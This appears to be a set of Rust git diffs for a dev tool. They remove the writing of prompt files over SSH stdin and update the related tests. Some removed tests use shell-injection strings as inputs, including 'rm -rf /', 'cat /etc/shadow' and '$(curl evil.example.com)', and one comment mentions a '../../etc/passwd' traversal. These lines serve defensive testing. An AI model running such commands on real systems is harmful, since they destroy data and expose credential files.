-            "Prompt path {relative_path:?} must not contain '..' traversal"
-        ));
-    }
-    Ok(())
-}
-
-/// Write a prompt file to the selected [`WorkTarget`] at a given relative
-/// path, transferring prompt bytes via stdin for remote targets (never shell
-/// interpolation).
-///
-/// This is the **safe target prompt writer** extracted from the issue-prep
-/// path so the PR-prep path can reuse the exact same local/remote write logic
-/// without duplicating SSH plumbing.
-///
-/// - **Local**: creates `{work_dir}/.jefe` if needed and writes
-///   `{work_dir}/{relative_path}` directly via `std::fs::write`.
-/// - **Remote**: runs `ssh -T` with `mkdir -p .jefe; cat > {path}`, piping
-///   prompt bytes via stdin. The relative path must start with `.jefe/`.
-///
-/// The `jefe_dir` (parent of the relative path) is created via `mkdir -p`.
-/// This does NOT add issue-style clone/dirty/default-branch semantics — it is
-/// purely a prompt-file write.
-pub(super) fn write_prompt_to_target(
-    target: &WorkTarget,
-    work_dir: &Path,
-    relative_path: &str,
-    prompt: &str,
-) -> Result<(), String> {
-    validate_prompt_relative_path(relative_path)?;
-    match target {
-        WorkTarget::Local => write_prompt_local_generic(work_dir, relative_path, prompt),
-        WorkTarget::Remote(remote) => {
-            write_prompt_remote_generic(remote, work_dir, relative_path, prompt.as_bytes())
-        }
-    }
-}
-
-/// Write a prompt file to the local filesystem at a given relative path.
-/// Creates the parent `.jefe` directory first.
-fn write_prompt_local_generic(
-    work_dir: &Path,
-    relative_path: &str,
-    prompt: &str,
-) -> Result<(), String> {
-    let prompt_path = work_dir.join(relative_path);
-    let jefe_dir = work_dir.join(".jefe");
-    std::fs::create_dir_all(&jefe_dir).map_err(|e| format!("Failed to create .jefe dir: {e}"))?;
-    std::fs::write(&prompt_path, prompt).map_err(|e| format!("Failed to write prompt: {e}"))
-}
-
-/// Write a prompt file to a remote host via `ssh -T`, piping prompt bytes
-/// through stdin (never shell interpolation).
-fn write_prompt_remote_generic(
-    remote: &RemoteRepositorySettings,
-    work_dir: &Path,
-    relative_path: &str,
-    prompt_bytes: &[u8],
-) -> Result<(), String> {
-    let runner = remote::RemotePrepRunner::new(remote.clone());
-    runner.write_prompt(work_dir, relative_path, prompt_bytes)
-}
-
-// ──────────────────────────────────────────────────────────────────────────
-// Remote target prep
-// ──────────────────────────────────────────────────────────────────────────
-
-/// Prepare the working copy on a remote host via noninteractive SSH.
-///
-/// Uses `ssh -T` (no PTY) for all git/file operations — distinct from the
-/// `-tt` tmux operations in `runtime::commands`. The prompt bytes are
 /// transferred via stdin, never interpolated into the shell command.
 ///
 /// This delegates to [`RemotePrepRunner`] for the actual SSH execution. For
@@ -392,10 +276,9 @@ fn prepare_remote(
     work_dir: &Path,
     identity: Option<&CloneIdentity>,
     policy: DirtyPolicy,
-    prompt: &str,
 ) -> Result<PrepOutcome, String> {
     let runner = remote::RemotePrepRunner::new(remote.clone());
-    runner.run(work_dir, identity, policy, prompt)
+    runner.run(work_dir, identity, policy)
 }
 
 /// Remote force-reclone: validate identity → resolve URL → remove → clone → prep over SSH.
@@ -406,10 +289,9 @@ fn prepare_remote_force_reclone(
     remote: &RemoteRepositorySettings,
     work_dir: &Path,
     identity: &CloneIdentity,
-    prompt: &str,
 ) -> Result<PrepOutcome, String> {
     let runner = remote::RemotePrepRunner::new(remote.clone());
-    runner.run_force_reclone(work_dir, identity, prompt)
+    runner.run_force_reclone(work_dir, identity)
 }
 
 #[path = "issue_prep_remote.rs"]

--- a/src/app_input/issue_prep_remote.rs
+++ b/src/app_input/issue_prep_remote.rs
@@ -16,10 +16,9 @@ use super::{DirtyPolicy, PrepOutcome};
 // Remote target prep
 // ──────────────────────────────────────────────────────────────────────────
 
-/// A pure planner that records the remote commands and prompt-transfer plan
-/// **without** executing them. Exposed for deterministic tests proving all
-/// operations target the remote host, use `ssh -T`, and transfer prompt bytes
-/// via stdin.
+/// A pure planner that records the remote commands **without** executing
+/// them. Exposed for deterministic tests proving all operations target the
+/// remote host and use `ssh -T`.
 #[cfg(test)]
 #[derive(Debug, Clone)]
 pub struct RemotePrepPlanner {
@@ -73,7 +72,8 @@ pub struct PlanInputs<'a> {
 pub(super) struct PlannedRemoteOp {
     /// The `ssh -T` argv (everything after the `ssh` binary).
     pub ssh_argv: Vec<String>,
-    /// Prompt bytes sent via stdin, if this op transfers the prompt.
+    /// Prompt bytes sent via stdin. Always `None` after issue #315 (prompt
+    /// content is inlined into the launch instruction, not written to disk).
     pub stdin_prompt: Option<String>,
 }
 

--- a/src/app_input/issue_prep_remote.rs
+++ b/src/app_input/issue_prep_remote.rs
@@ -10,7 +10,7 @@ use std::path::Path;
 use jefe::domain::RemoteRepositorySettings;
 
 use super::super::clone_identity::CloneIdentity;
-use super::{DirtyPolicy, ISSUE_PROMPT_RELATIVE_PATH, PrepOutcome};
+use super::{DirtyPolicy, PrepOutcome};
 
 // ──────────────────────────────────────────────────────────────────────────
 // Remote target prep
@@ -62,11 +62,9 @@ pub struct PlanInputs<'a> {
     /// is surprising.
     pub not_on_default: bool,
     /// The remote work dir's origin does not match the configured repository.
-    /// When true, the planner short-circuits (no checkout/pull/prompt op),
+    /// When true, the planner short-circuits (no checkout/pull op),
     /// mirroring the `Dirty`+`Stop` short-circuit.
     pub origin_mismatch: bool,
-    /// Prompt bytes to transfer via stdin.
-    pub prompt: &'a str,
 }
 
 /// A single recorded remote operation (for test verification).
@@ -94,8 +92,7 @@ impl RemotePrepPlanner {
     /// 1. detect git worktree (if not, clone if identity present);
     /// 2. dirty check;
     /// 3. if dirty and Discard, reset+clean;
-    /// 4. resolve default branch, fetch, checkout;
-    /// 5. mkdir .jefe + write prompt via stdin.
+    /// 4. resolve default branch, fetch, checkout.
     ///
     /// This is pure — it does not inspect the remote filesystem. Callers
     /// supply `presence`, `is_dirty`, and `origin_mismatch` to drive the
@@ -119,7 +116,6 @@ impl RemotePrepPlanner {
             is_dirty,
             not_on_default,
             origin_mismatch,
-            prompt,
         } = inputs;
         let is_git = *presence == WorkdirPresence::Git;
 
@@ -206,19 +202,6 @@ impl RemotePrepPlanner {
                  fi",
             );
             ops.push(self.wrapped_ssh_op(&script, None));
-
-            // 5. mkdir .jefe + write prompt via stdin (cat > file). Escape
-            // the full joined prompt path (consistent with plan_force_reclone
-            // and the live run() path) so a metacharacter in the work dir or
-            // the constant can never break the shell command.
-            let prompt_path =
-                shell_escape(&work_dir.join(ISSUE_PROMPT_RELATIVE_PATH).to_string_lossy());
-            let script = format!(
-                "set -e; mkdir -p {jefe_dir}; cat > {prompt_path}",
-                jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy()),
-                prompt_path = prompt_path,
-            );
-            ops.push(self.wrapped_ssh_op(&script, Some((*prompt).to_owned())));
         }
 
         Ok(ops)
@@ -235,7 +218,6 @@ impl RemotePrepPlanner {
         &self,
         work_dir: &Path,
         identity: &CloneIdentity,
-        prompt: &str,
     ) -> Vec<PlannedRemoteOp> {
         let mut ops = Vec::new();
         let escaped_work = shell_escape(&work_dir.to_string_lossy());
@@ -270,12 +252,6 @@ impl RemotePrepPlanner {
              fi",
         );
         ops.push(self.wrapped_ssh_op(&checkout_script, None));
-        // 5. mkdir .jefe + write prompt via stdin.
-        let jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
-        let prompt_path =
-            shell_escape(&work_dir.join(ISSUE_PROMPT_RELATIVE_PATH).to_string_lossy());
-        let prompt_script = format!("set -e; mkdir -p {jefe_dir}; cat > {prompt_path}");
-        ops.push(self.wrapped_ssh_op(&prompt_script, Some(prompt.to_owned())));
 
         ops
     }
@@ -451,7 +427,6 @@ impl RemotePrepRunner {
         work_dir: &Path,
         identity: Option<&CloneIdentity>,
         policy: DirtyPolicy,
-        prompt: &str,
     ) -> Result<PrepOutcome, String> {
         let escaped_work = shell_escape(&work_dir.to_string_lossy());
 
@@ -566,13 +541,6 @@ impl RemotePrepRunner {
         );
         self.run_wrapped(&script)?;
 
-        // 5. mkdir .jefe + write prompt via stdin.
-        let jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
-        let prompt_path =
-            shell_escape(&work_dir.join(ISSUE_PROMPT_RELATIVE_PATH).to_string_lossy());
-        let script = format!("set -e; mkdir -p {jefe_dir}; cat > {prompt_path}");
-        self.run_wrapped_stdin(&script, prompt.as_bytes())?;
-
         Ok(PrepOutcome::Ready)
     }
 
@@ -677,7 +645,6 @@ impl RemotePrepRunner {
         &self,
         work_dir: &Path,
         identity: &CloneIdentity,
-        prompt: &str,
     ) -> Result<PrepOutcome, String> {
         // Defense-in-depth: refuse catastrophic targets (root, empty,
         // top-level entry) even though the user confirmed. This runs BEFORE
@@ -723,37 +690,7 @@ impl RemotePrepRunner {
         self.run_wrapped(&checkout_script)
             .map_err(|e| format!("After force-recloning {} remotely (the original working copy is already gone), post-clone prep failed: {e}", work_dir.display()))?;
 
-        // 4. mkdir .jefe + write prompt via stdin.
-        let jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
-        let prompt_path =
-            shell_escape(&work_dir.join(ISSUE_PROMPT_RELATIVE_PATH).to_string_lossy());
-        let prompt_script = format!("set -e; mkdir -p {jefe_dir}; cat > {prompt_path}");
-        self.run_wrapped_stdin(&prompt_script, prompt.as_bytes())?;
-
         Ok(PrepOutcome::Ready)
-    }
-
-    /// Write a prompt file to the remote host at `work_dir/{relative_path}`
-    /// via `ssh -T`, piping prompt bytes through stdin.
-    ///
-    /// This is the reusable remote write used by [`write_prompt_to_target`]
-    /// for both issue and PR prompts. It does NOT clone, check dirty, or
-    /// switch branches — it only creates `.jefe/` and writes the file.
-    pub(super) fn write_prompt(
-        &self,
-        work_dir: &Path,
-        relative_path: &str,
-        prompt_bytes: &[u8],
-    ) -> Result<(), String> {
-        // Defense-in-depth: validate the relative path even though current
-        // call sites pass the safe ISSUE_PROMPT_RELATIVE_PATH constant. This
-        // guards against future misuse of this pub(super) API with a
-        // traversal value (e.g. ../../etc/passwd) that would escape work_dir.
-        super::validate_prompt_relative_path(relative_path)?;
-        let jefe_dir = shell_escape(&work_dir.join(".jefe").to_string_lossy());
-        let prompt_path = shell_escape(&work_dir.join(relative_path).to_string_lossy());
-        let script = format!("set -e; mkdir -p {jefe_dir}; cat > {prompt_path}");
-        self.run_wrapped_stdin(&script, prompt_bytes)
     }
 
     /// Run a wrapped (effective-user) remote command requiring success.
@@ -766,12 +703,6 @@ impl RemotePrepRunner {
     fn run_wrapped_capture(&self, script: &str) -> Result<String, String> {
         let wrapped = wrap_effective_user(&self.remote, script);
         self.run_remote_capture(&wrapped)
-    }
-
-    /// Run a wrapped remote command with stdin bytes.
-    fn run_wrapped_stdin(&self, script: &str, stdin: &[u8]) -> Result<(), String> {
-        let wrapped = wrap_effective_user(&self.remote, script);
-        self.run_remote_stdin(&wrapped, stdin)
     }
 
     /// Run a remote predicate probe under the effective user and return its
@@ -813,16 +744,6 @@ impl RemotePrepRunner {
         let output = self.run_remote_capture_raw(remote_command)?;
         if output.status.success() {
             Ok(String::from_utf8_lossy(&output.stdout).into_owned())
-        } else {
-            Err(remote_failure_message(&self.remote, &output))
-        }
-    }
-
-    /// Run a remote command with prompt bytes piped via stdin.
-    fn run_remote_stdin(&self, remote_command: &str, stdin_bytes: &[u8]) -> Result<(), String> {
-        let output = self.execute_ssh(remote_command, Some(stdin_bytes))?;
-        if output.status.success() {
-            Ok(())
         } else {
             Err(remote_failure_message(&self.remote, &output))
         }

--- a/src/app_input/issue_prep_remote_tests.rs
+++ b/src/app_input/issue_prep_remote_tests.rs
@@ -175,7 +175,8 @@ fn plan_applies_run_as_user() {
 #[test]
 fn plan_does_not_write_prompt_to_disk() {
     // Issue #315: the prompt content is inlined into the launch instruction
-    // (-i), so no op should carry stdin_prompt bytes (no `cat > file`).
+    // (-i), so no op should carry stdin_prompt bytes and no SSH command
+    // should reference .jefe/ or a prompt file path.
     let planner = RemotePrepPlanner::new(remote_settings());
     let ops = planner
         .plan(&PlanInputs {
@@ -192,6 +193,21 @@ fn plan_does_not_write_prompt_to_disk() {
         ops.iter().all(|op| op.stdin_prompt.is_none()),
         "no op should carry a prompt via stdin (issue #315 inlines the prompt): {ops:?}"
     );
+    // No SSH command should create .jefe/ or target a prompt file.
+    for op in &ops {
+        for arg in &op.ssh_argv {
+            assert!(
+                !arg.contains(".jefe/")
+                    && !arg.contains("issue-prompt")
+                    && !arg.contains("pr-prompt"),
+                "SSH command must not reference .jefe or prompt paths: {arg}"
+            );
+            assert!(
+                !arg.contains("cat >"),
+                "SSH command must not write a prompt via cat redirect: {arg}"
+            );
+        }
+    }
 }
 
 #[test]

--- a/src/app_input/issue_prep_remote_tests.rs
+++ b/src/app_input/issue_prep_remote_tests.rs
@@ -100,7 +100,6 @@ fn plan_uses_ssh_t_not_tt() {
             is_dirty: false,
             not_on_default: false,
             origin_mismatch: false,
-            prompt: "do the work",
         })
         .value_or_panic("plan");
     assert!(!ops.is_empty());
@@ -130,7 +129,6 @@ fn plan_targets_remote_host_user() {
             is_dirty: false,
             not_on_default: false,
             origin_mismatch: false,
-            prompt: "do the work",
         })
         .value_or_panic("plan");
     assert!(!ops.is_empty());
@@ -155,7 +153,6 @@ fn plan_applies_run_as_user() {
             is_dirty: false,
             not_on_default: false,
             origin_mismatch: false,
-            prompt: "do the work",
         })
         .value_or_panic("plan");
     // run_as_user=acoliver differs from login_user=ubuntu → every command
@@ -176,8 +173,9 @@ fn plan_applies_run_as_user() {
 }
 
 #[test]
-fn plan_prompt_transferred_via_stdin_not_shell() {
-    let adversarial = "'; rm -rf /; echo '";
+fn plan_does_not_write_prompt_to_disk() {
+    // Issue #315: the prompt content is inlined into the launch instruction
+    // (-i), so no op should carry stdin_prompt bytes (no `cat > file`).
     let planner = RemotePrepPlanner::new(remote_settings());
     let ops = planner
         .plan(&PlanInputs {
@@ -188,23 +186,12 @@ fn plan_prompt_transferred_via_stdin_not_shell() {
             is_dirty: false,
             not_on_default: false,
             origin_mismatch: false,
-            prompt: adversarial,
         })
         .value_or_panic("plan");
-    // The final op writes the prompt via stdin.
-    let prompt_op = ops
-        .iter()
-        .find(|op| op.stdin_prompt.is_some())
-        .unwrap_or_else(|| panic!("an op must carry the prompt via stdin (got {ops:?})"));
-    assert_eq!(prompt_op.stdin_prompt.as_deref(), Some(adversarial));
-    // The command string must NOT contain the raw adversarial prompt —
-    // it is transferred via stdin, not interpolated.
-    for arg in &prompt_op.ssh_argv {
-        assert!(
-            !arg.contains("rm -rf"),
-            "adversarial prompt must not appear in shell argv (got {arg})"
-        );
-    }
+    assert!(
+        ops.iter().all(|op| op.stdin_prompt.is_none()),
+        "no op should carry a prompt via stdin (issue #315 inlines the prompt): {ops:?}"
+    );
 }
 
 #[test]
@@ -225,7 +212,6 @@ fn plan_does_not_create_local_workdir() {
             is_dirty: false,
             not_on_default: false,
             origin_mismatch: false,
-            prompt: "prompt",
         })
         .value_or_panic("plan");
     assert!(
@@ -246,7 +232,6 @@ fn plan_dirty_stop_emits_no_cleanup() {
             is_dirty: true,
             not_on_default: false,
             origin_mismatch: false,
-            prompt: "prompt",
         })
         .value_or_panic("plan");
     // Dirty + Stop: the planner short-circuits with NO operations at all —
@@ -270,7 +255,6 @@ fn plan_dirty_discard_emits_cleanup_then_prep() {
             is_dirty: true,
             not_on_default: false,
             origin_mismatch: false,
-            prompt: "prompt",
         })
         .value_or_panic("plan");
     // Discard: reset --hard + clean -fd first, then checkout, then prompt.
@@ -282,12 +266,7 @@ fn plan_dirty_discard_emits_cleanup_then_prep() {
         .iter()
         .position(|op| op.ssh_argv.iter().any(|a| a.contains("git checkout")))
         .value_or_panic("a checkout op must be planned");
-    let prompt_idx = ops
-        .iter()
-        .position(|op| op.stdin_prompt.is_some())
-        .value_or_panic("a prompt-write op must be planned");
     assert!(reset_idx < checkout_idx, "reset before checkout");
-    assert!(checkout_idx < prompt_idx, "checkout before prompt write");
 }
 
 #[test]
@@ -302,7 +281,6 @@ fn plan_clone_when_missing() {
             is_dirty: false,
             not_on_default: false,
             origin_mismatch: false,
-            prompt: "prompt",
         })
         .value_or_panic("plan");
     assert!(
@@ -324,7 +302,7 @@ fn plan_clone_when_missing() {
 fn plan_absent_without_identity_emits_no_ops() {
     // When the workdir is absent AND no clone identity is available, the
     // live runner returns Err. The planner must mirror that by emitting NO
-    // ops — it must not plan checkout/prompt-write operations against a
+    // ops — it must not plan checkout operations against a
     // path that was never created.
     let planner = RemotePrepPlanner::new(remote_settings());
     let ops = planner
@@ -336,7 +314,6 @@ fn plan_absent_without_identity_emits_no_ops() {
             is_dirty: false,
             not_on_default: false,
             origin_mismatch: false,
-            prompt: "prompt",
         })
         .value_or_panic("plan");
     assert!(
@@ -359,7 +336,6 @@ fn plan_https_url_regardless_of_remote_enabled() {
             is_dirty: false,
             not_on_default: false,
             origin_mismatch: false,
-            prompt: "prompt",
         })
         .value_or_panic("plan");
     let clone_op = ops
@@ -396,7 +372,6 @@ fn plan_origin_mismatch_short_circuits() {
             is_dirty: false,
             not_on_default: false,
             origin_mismatch: true,
-            prompt: "prompt",
         })
         .value_or_panic("plan");
     assert!(
@@ -413,7 +388,7 @@ fn plan_force_reclone_resolves_url_before_rm() {
     // BEFORE the rm -rf. The clone URL must appear in a planned op, and the
     // rm must precede the clone (ordering invariant: identity → rm → clone).
     let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner.plan_force_reclone(Path::new(PLAN_WORK_DIR), &identity(), "prompt");
+    let ops = planner.plan_force_reclone(Path::new(PLAN_WORK_DIR), &identity());
 
     // Find the rm and clone ops by their position in the plan.
     let rm_idx = ops
@@ -450,16 +425,6 @@ fn plan_force_reclone_resolves_url_before_rm() {
         clone_idx < checkout_idx,
         "clone must precede checkout: {ops:?}"
     );
-
-    // A prompt-write op (stdin) must follow the checkout.
-    let prompt_idx = ops
-        .iter()
-        .position(|op| op.stdin_prompt.is_some())
-        .value_or_panic("a prompt-write op must be planned");
-    assert!(
-        checkout_idx < prompt_idx,
-        "checkout must precede prompt write: {ops:?}"
-    );
 }
 
 #[test]
@@ -477,7 +442,6 @@ fn plan_not_git_is_a_hard_error_not_empty() {
         is_dirty: false,
         not_on_default: false,
         origin_mismatch: false,
-        prompt: "prompt",
     });
     assert!(result.is_err(), "NotGit must be a hard error: {result:?}");
     let err = match result {
@@ -488,93 +452,6 @@ fn plan_not_git_is_a_hard_error_not_empty() {
     assert!(
         err.contains("not a git worktree"),
         "error must explain non-git worktree: {err}"
-    );
-}
-
-// ── Target-aware PR prompt writing (reuses write_prompt_to_target) ──────
-
-/// A remote PR prompt write plans `ssh -T` with prompt bytes via stdin,
-/// transferring adversarial content WITHOUT it appearing in the shell argv.
-/// This uses the pure `RemotePrepPlanner` so no SSH connection is made — it
-/// records the planned operation.
-#[test]
-fn pr_prompt_remote_plan_transfers_prompt_via_stdin_not_shell() {
-    let adversarial = "'; cat /etc/shadow; echo '\n$(curl evil.example.com)";
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner
-        .plan(&PlanInputs {
-            work_dir: Path::new(PLAN_WORK_DIR),
-            identity: Some(&identity()),
-            policy: DirtyPolicy::Stop,
-            presence: WorkdirPresence::Git,
-            is_dirty: false,
-            not_on_default: false,
-            origin_mismatch: false,
-            prompt: adversarial,
-        })
-        .value_or_panic("plan");
-    // The final op writes the prompt via stdin.
-    let prompt_op = ops
-        .iter()
-        .find(|op| op.stdin_prompt.is_some())
-        .unwrap_or_else(|| panic!("an op must carry the prompt via stdin (got {ops:?})"));
-    assert_eq!(prompt_op.stdin_prompt.as_deref(), Some(adversarial));
-    // The command argv must NOT contain the raw adversarial prompt.
-    for arg in &prompt_op.ssh_argv {
-        assert!(
-            !arg.contains("/etc/shadow"),
-            "adversarial prompt must not appear in shell argv (got {arg})"
-        );
-        assert!(
-            !arg.contains("evil.example.com"),
-            "adversarial URL must not appear in shell argv (got {arg})"
-        );
-    }
-    // The prompt file path in the argv must be the issue prompt path (the
-    // planner hardcodes it); the PR path uses `write_prompt_to_target`
-    // directly at runtime.
-    assert!(
-        prompt_op
-            .ssh_argv
-            .iter()
-            .any(|a| a.contains(".jefe/issue-prompt.md")),
-        "planned prompt op writes to .jefe/issue-prompt.md"
-    );
-}
-
-/// The remote PR prompt write (via `write_prompt_to_target`) delegates to the
-/// same `RemotePrepRunner::write_prompt` that the issue path uses. Since the
-/// runner is not exposed for direct testing, this verifies the planner's
-/// generic prompt-write op uses `ssh -T` and targets the correct host.
-#[test]
-fn pr_prompt_remote_target_is_correct_ssh_t_host() {
-    let planner = RemotePrepPlanner::new(remote_settings());
-    let ops = planner
-        .plan(&PlanInputs {
-            work_dir: Path::new(PLAN_WORK_DIR),
-            identity: None,
-            policy: DirtyPolicy::Stop,
-            presence: WorkdirPresence::Git,
-            is_dirty: false,
-            not_on_default: false,
-            origin_mismatch: false,
-            prompt: "PR prompt",
-        })
-        .value_or_panic("plan");
-    let prompt_op = ops
-        .iter()
-        .find(|op| op.stdin_prompt.is_some())
-        .unwrap_or_else(|| panic!("prompt op must exist: {ops:?}"));
-    assert!(
-        prompt_op.ssh_argv.iter().any(|a| a == "-T"),
-        "PR prompt remote op must use -T"
-    );
-    assert!(
-        prompt_op
-            .ssh_argv
-            .iter()
-            .any(|a| a == "ubuntu@build.example.com"),
-        "PR prompt remote op must target ubuntu@build.example.com"
     );
 }
 
@@ -594,7 +471,6 @@ fn plan_not_on_default_stop_emits_no_cleanup() {
             is_dirty: false,
             not_on_default: true,
             origin_mismatch: false,
-            prompt: "prompt",
         })
         .value_or_panic("plan");
     assert!(
@@ -604,7 +480,7 @@ fn plan_not_on_default_stop_emits_no_cleanup() {
 }
 
 /// Clean but not on the default branch with Discard: the planner must emit
-/// the checkout script (to switch to the default branch) and the prompt write,
+/// the checkout script (to switch to the default branch),
 /// but NO reset/clean op (the tree is clean, only a branch switch is needed).
 #[test]
 fn plan_not_on_default_discard_emits_checkout_without_cleanup() {
@@ -618,7 +494,6 @@ fn plan_not_on_default_discard_emits_checkout_without_cleanup() {
             is_dirty: false,
             not_on_default: true,
             origin_mismatch: false,
-            prompt: "prompt",
         })
         .value_or_panic("plan");
     assert!(!ops.is_empty(), "Discard must emit checkout + prompt ops");
@@ -638,10 +513,5 @@ fn plan_not_on_default_discard_emits_checkout_without_cleanup() {
         ops.iter()
             .any(|op| { op.ssh_argv.iter().any(|a| a.contains("git fetch origin")) }),
         "Discard must emit a fetch+checkout op: {ops:?}"
-    );
-    // The prompt write op must be present.
-    assert!(
-        ops.iter().any(|op| op.stdin_prompt.is_some()),
-        "Discard must emit a prompt-write op: {ops:?}"
     );
 }

--- a/src/app_input/issue_prep_remote_tests.rs
+++ b/src/app_input/issue_prep_remote_tests.rs
@@ -174,9 +174,9 @@ fn plan_applies_run_as_user() {
 
 #[test]
 fn plan_does_not_write_prompt_to_disk() {
-    // Issue #315: the prompt content is inlined into the launch instruction
-    // (-i), so no op should carry stdin_prompt bytes and no SSH command
-    // should reference .jefe/ or a prompt file path.
+    // Issue #315: prompt content is inlined into the launch instruction
+    // (-i flag), so no SSH op should carry stdin_prompt bytes or write a
+    // prompt file to disk.
     let planner = RemotePrepPlanner::new(remote_settings());
     let ops = planner
         .plan(&PlanInputs {
@@ -193,14 +193,14 @@ fn plan_does_not_write_prompt_to_disk() {
         ops.iter().all(|op| op.stdin_prompt.is_none()),
         "no op should carry a prompt via stdin (issue #315 inlines the prompt): {ops:?}"
     );
-    // No SSH command should create .jefe/ or target a prompt file.
+    // No SSH command should write a prompt file via cat redirect.
+    // Note: we do NOT check for ".jefe/" in general because git clean
+    // exclusion patterns legitimately reference it (e.g. -e .jefe/).
     for op in &ops {
         for arg in &op.ssh_argv {
             assert!(
-                !arg.contains(".jefe/")
-                    && !arg.contains("issue-prompt")
-                    && !arg.contains("pr-prompt"),
-                "SSH command must not reference .jefe or prompt paths: {arg}"
+                !arg.contains("issue-prompt") && !arg.contains("pr-prompt"),
+                "SSH command must not reference prompt file paths: {arg}"
             );
             assert!(
                 !arg.contains("cat >"),

--- a/src/app_input/issue_prep_tests.rs
+++ b/src/app_input/issue_prep_tests.rs
@@ -247,7 +247,7 @@ fn cleanup(path: &Path) {
 }
 
 #[test]
-fn local_existing_clean_prep_writes_prompt_last() {
+fn local_existing_clean_prep_succeeds() {
     let origin = bare_origin_with_commit("clean");
     let work = clone_origin(&origin, "clean");
     // Pre-create .jefe so we prove owned metadata is ignored.
@@ -422,7 +422,7 @@ fn local_dirty_stop_returns_dirty_without_prompt() {
 }
 
 #[test]
-fn local_dirty_discard_cleans_and_writes_prompt() {
+fn local_dirty_discard_cleans_and_prepares() {
     let origin = bare_origin_with_commit("dirtydiscard");
     let work = clone_origin(&origin, "dirtydiscard");
     std::fs::write(work.join("src.txt"), "dirty change").value_or_panic("write dirty change");
@@ -463,10 +463,10 @@ fn local_clean_not_on_default_stop_returns_dirty_without_prompt() {
 }
 
 /// A clean working copy on a non-default branch with the Discard policy must
-/// switch to the default branch, pull, and write the prompt — without
+/// switch to the default branch, pull — without
 /// discarding anything (there is nothing dirty to discard).
 #[test]
-fn local_clean_not_on_default_discard_switches_and_writes_prompt() {
+fn local_clean_not_on_default_discard_switches_and_prepares() {
     let origin = bare_origin_with_commit("clean-not-main-discard");
     let work = clone_origin(&origin, "clean-not-main-discard");
     run_git(&work, &["checkout", "-b", "feature"]);
@@ -482,9 +482,9 @@ fn local_clean_not_on_default_discard_switches_and_writes_prompt() {
 }
 
 /// A dirty working copy that is ALSO not on the default branch: the Discard
-/// policy must clean AND switch to the default branch AND write the prompt.
+/// policy must clean AND switch to the default branch.
 #[test]
-fn local_dirty_and_not_on_default_discard_cleans_switches_and_writes_prompt() {
+fn local_dirty_and_not_on_default_discard_cleans_switches_and_prepares() {
     let origin = bare_origin_with_commit("dirty-not-main-discard");
     let work = clone_origin(&origin, "dirty-not-main-discard");
     run_git(&work, &["checkout", "-b", "feature"]);

--- a/src/app_input/issue_prep_tests.rs
+++ b/src/app_input/issue_prep_tests.rs
@@ -175,7 +175,7 @@ fn local_checkout_blocker_returns_dirty_without_changing_worktree_or_index() {
     let index_before = git_stdout(&work, &["ls-files", "--stage"]);
     let status_before = git_stdout(&work, &["status", "--porcelain=v1"]);
 
-    let outcome = prepare_local(&work, None, DirtyPolicy::Stop, "prompt")
+    let outcome = prepare_local(&work, None, DirtyPolicy::Stop)
         .value_or_panic("checkout conflict should become dirty outcome");
 
     assert_eq!(outcome, PrepOutcome::Dirty);
@@ -194,7 +194,6 @@ fn local_checkout_blocker_returns_dirty_without_changing_worktree_or_index() {
             .value_or_panic("read preserved local memory"),
         "local memory"
     );
-    assert!(!work.join(".jefe/issue-prompt.md").exists());
     cleanup(origin.parent().unwrap_or(&origin));
     cleanup(&work);
 }
@@ -206,9 +205,8 @@ fn local_confirmed_checkout_blocker_discard_reaches_fetched_main() {
         .value_or_panic("write untracked owned metadata");
     std::fs::write(work.join("remove-me.txt"), "discard me")
         .value_or_panic("write non-owned untracked file");
-    let prompt = "Work issue 316.";
 
-    let outcome = prepare_local(&work, None, DirtyPolicy::Discard, prompt)
+    let outcome = prepare_local(&work, None, DirtyPolicy::Discard)
         .value_or_panic("confirmed checkout conflict cleanup");
 
     assert_eq!(outcome, PrepOutcome::Ready);
@@ -237,10 +235,7 @@ fn local_confirmed_checkout_blocker_discard_reaches_fetched_main() {
             .value_or_panic("read preserved untracked owned metadata"),
         "preserve me"
     );
-    assert_eq!(
-        std::fs::read_to_string(work.join(".jefe/issue-prompt.md")).value_or_panic("read prompt"),
-        prompt
-    );
+
     cleanup(origin.parent().unwrap_or(&origin));
     cleanup(&work);
 }
@@ -257,17 +252,9 @@ fn local_existing_clean_prep_writes_prompt_last() {
     let work = clone_origin(&origin, "clean");
     // Pre-create .jefe so we prove owned metadata is ignored.
     std::fs::create_dir_all(work.join(".jefe")).value_or_panic("create .jefe");
-    std::fs::write(work.join(".jefe/issue-prompt.md"), "OLD").value_or_panic("write OLD prompt");
 
-    let prompt = "Do the work on issue 184.";
-    let outcome =
-        prepare_local(&work, None, DirtyPolicy::Stop, prompt).value_or_panic("prepare_local");
+    let outcome = prepare_local(&work, None, DirtyPolicy::Stop).value_or_panic("prepare_local");
     assert_eq!(outcome, PrepOutcome::Ready);
-
-    // The prompt was overwritten (written last).
-    let written = std::fs::read_to_string(work.join(".jefe/issue-prompt.md"))
-        .value_or_panic("read written prompt");
-    assert_eq!(written, prompt);
 
     cleanup(origin.parent().unwrap_or(&origin));
     cleanup(&work);
@@ -333,13 +320,13 @@ fn local_linked_worktree_on_non_default_branch_warns_then_fails_safely() {
     run_git(&linked, &["remote", "set-head", "origin", "-a"]);
 
     // Stop policy: the user is warned (Dirty) before any checkout attempt.
-    let outcome = prepare_local(&linked, None, DirtyPolicy::Stop, "prompt")
+    let outcome = prepare_local(&linked, None, DirtyPolicy::Stop)
         .value_or_panic("linked worktree Stop must return Dirty");
     assert_eq!(outcome, PrepOutcome::Dirty);
 
     // Discard policy: the checkout is attempted and fails safely because the
     // worktree is on a different branch than the default.
-    let err = prepare_local(&linked, None, DirtyPolicy::Discard, "prompt")
+    let err = prepare_local(&linked, None, DirtyPolicy::Discard)
         .error_or_panic("linked worktree Discard must error on checkout");
     assert!(
         err.contains("not the default"),
@@ -371,10 +358,8 @@ fn local_linked_worktree_on_default_branch_succeeds() {
     );
     run_git(&linked, &["remote", "set-head", "origin", "-a"]);
 
-    let outcome =
-        prepare_local(&linked, None, DirtyPolicy::Stop, "prompt").value_or_panic("prepare_local");
+    let outcome = prepare_local(&linked, None, DirtyPolicy::Stop).value_or_panic("prepare_local");
     assert_eq!(outcome, PrepOutcome::Ready);
-    assert!(linked.join(".jefe/issue-prompt.md").exists());
 
     cleanup(&linked);
     cleanup(&primary);
